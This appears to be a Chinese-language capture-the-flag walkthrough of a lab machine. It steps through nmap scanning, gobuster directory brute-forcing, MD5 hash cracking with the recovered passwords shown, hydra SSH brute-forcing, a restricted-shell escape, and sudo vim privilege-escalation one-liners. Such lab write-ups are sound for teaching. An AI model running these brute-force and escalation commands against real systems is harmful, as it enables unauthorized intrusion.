一、信息收集
1、查看靶机的MAC地址:
2、查看靶机的ip地址:
nmap 192.168.13.0/24
3、查看靶机开放的端口:
nmap -p- -sC -sT -sV -A 192.168.13.160
4、访问靶机的8080端口:
5、页面中发现有一个目录html_pages,拼接访问一下:
6、依次拼接查看,发现只有downloads.html有点用,在源代码处有一个流量包下载地址:
7、下载流量包,并使用wireshark打开,查看流量包内容,中间发现了许多登录框:
8、发现这个页面有Patrick的密码逻辑:
9、进行目录爆破:
gobuster dir -u http://192.168.13.160:8080/developmentsecretpage/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,js,txt,html
10、在version.txt文件中发现了两个文件slog_users.txt 和 slog_users.php:
11、在txt文件中发现了许多账号和密码:
12、使用MD5进行解密,解密结果如下,admin的密码没有解密出来:
admin, 3cb1d13bb83ffff2defe8d1443d3a0eb---------没有解出来 intern, 4a8a2b374f463b7aedbb44a066363b81--------12345678900987654321 patrick, 87e6d56ce79af90dbe07d387d3d0579e-------P@ssw0rd25 qiu, ee64497098d0926d198f54f6d5431f98-----------qiu
13、使用上面的账号和密码制作字典,使用hydra进行爆破ssh账号和密码:
hydra -L /home/kali/username.txt -P /home/kali/pass.txt ssh://192.168.13.160
账号密码是:intern 和12345678900987654321
14、使用账号密码进行ssh连接:
15、发现执行命令,什么命令也没法执行,用户权限有限:
二、提权
1、使用命令获得正常交互式shell:
echo os.system('/bin/bash')
2、输入sudo -l查看是否有sudo权限,发现没有权限:
3、查看/etc/passwd文件,查看是否有其它用户,发现有patrick用户:
4、尝试使用密码切换这个用户:
5、查看是否有sudo权限:
sudo -l
6、发现这个用户有sudo权限,使用命令进行提权:
sudo vim -c ':!/bin/sh'
sudo vim -c ':py import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
sudo vim -c ':lua os.execute("reset; exec sh")'